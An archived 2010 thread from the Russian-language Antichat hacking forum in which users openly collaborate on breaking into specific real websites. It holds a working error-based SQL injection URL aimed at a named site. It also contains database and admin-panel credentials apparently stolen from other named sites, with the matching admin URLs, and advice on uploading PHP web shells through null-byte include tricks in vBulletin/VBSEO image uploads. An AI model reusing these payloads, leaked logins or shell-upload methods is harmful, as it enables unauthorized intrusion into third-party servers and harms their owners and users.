ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.03.2010, 00:06
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от v1d0qz
Потому что ua_menu_item 1, - единица вставляется от условия для ошибки дублей. Да и вообще, зачем эта гора урла, когда можно просто..
Код:
http://www.zed.ua/en/index.php?id=1+or(1,1)=(select(count(0)),concat((select(column_name)from(information_schema.columns(where)table_name=0x75615f6d656e755f6974656d)limit+0,1),floor(rand(0)*2))from(information_schema.tables)GROUP+BY+2)
Сообщение от LokbatanLi
не получилось
Конечно не получилось, там где where, нужно было развенуть дужки. Ничего не хочет думать молодёжь...
Последний раз редактировалось v1d0qz; 26.03.2010 в 00:10..
|
|
|
26.03.2010, 00:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от CyberHunter
Ну может у кого есть уже залитый шелл и не жалко показать 
<?php
$host="localhost";
$db_login="ksh";
$db_password="mysql00";
$database="shokoladka";
@mysql_connect($host, $db_login, $db_password) or die("Не могу подсоединиться к серверу!");
@mysql_select_db($database) or die("Не могу выбрать базу!");
?>
Код:
http://www.shokoladka.ru/myadmin/
Последний раз редактировалось Pashkela; 26.03.2010 в 00:15..
|
|
|
|
26.03.2010, 00:17
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Pashkela спасибо большое.
Но я имел ввиду, чтобы шелл уже был залит на сайт
А твой скрипт насколько я понял - это и есть веб-шелл, который нужно заливать, после чего получаешь управление над сервером? Правильно?
|
|
|
|
26.03.2010, 00:18
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Pashkela на соседнем сайте есть папки где запись разрешена, попробуй туда залить, или тамже через админку дле... лень там копатся (:
Код:
http://www.autonarod.ru/admin.php
autonarod:churka1
|
|
|
|
26.03.2010, 00:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от jecka3000
mailbrush,
на сколько я знаю, именна эта конструкция применялась пр загрузке шелла на форум vbulletin с VBSEO( если аватарки лежали не в БД)
Во-первых - это был инклуд, во-вторых - там была конструкция file.gif%00.php, из-за которой интерпретатор думал, что ему передается php файл, а функция инклуда обрезала его и инклудила картинку - это совсем другой случай. А то, что показал ты - это вообще бред. Зачем ставить нулл-байт в конце строки? Какой с него толк?
|
|
|
|
26.03.2010, 00:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от warlok
Pashkela на соседнем сайте есть папки где запись разрешена, попробуй туда залить, или тамже через админку дле... лень там копатся (:
Код:
http://www.autonarod.ru/admin.php
autonarod:churka1
)) пусть сам уже дальше думает) там не один сайт по reverse ip
|
|
|
|
26.03.2010, 00:30
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от jecka3000
mailbrush,
на сколько я знаю, именна эта конструкция применялась пр загрузке шелла на форум vbulletin с VBSEO( если аватарки лежали не в БД)
Ты проверял хоть? Зачем говорить от балды? Вообще-то в vbulletin фильтр стоит нормальный на загрузку файлов, я с ним копался как-то...
К тому же, для инклуда достаточно картинку залить, зачем эта конструкция, я не понял? Если б она прокатывала, не нужно было бы никаких инклудов.
Там кстати не катит простое добавление пхп-кода в картинку, с ним пошаманить нужно.
|
|
|
|
26.03.2010, 00:35
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
)) пусть сам уже дальше думает) там не один сайт по reverse ip
Pashkela, ну допустим есть доступ для записи, а что заливать? какой скрипт? Видел в избранном WSО(веб-шелл), на что-то типа этого заливать?
И куда заливать? Как писали, через поля для баннеров, картинок и т.д.?
|
|
|
|
26.03.2010, 00:35
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Root-access, там было два вида инклуда картинки. Один - с $_GET['vbseoembedd']=1, когда в параметре достаточно было поставить файл на инклуд, как он работал, с любым расширением. В более новых версиях эту багу прикрыли, проверяя расширение на .php, но и тут был выход - функция, которой они проверяли расширение не пропускала нулбайт, тобишь последними символами она считала .php, и сценарий шёл дальше - include() инклудила файл, но уже обрезав расширение. А пост jecka3000 вообще никакого отношения к этому не имеет. И еще, ты так и не ответил на мой вопрос, jecka3000, зачем нуллбайт в конце строки?
|
|
|
|
26.03.2010, 00:39
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от Root-access
Там кстати не катит простое добавление пхп-кода в картинку, с ним пошаманить нужно.
спрашивал тут както об этом, никто тогда не ответил) оно его вырезает, как обходил ?
зы кстати при загрузке не аватары а фотографии такого нету.
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
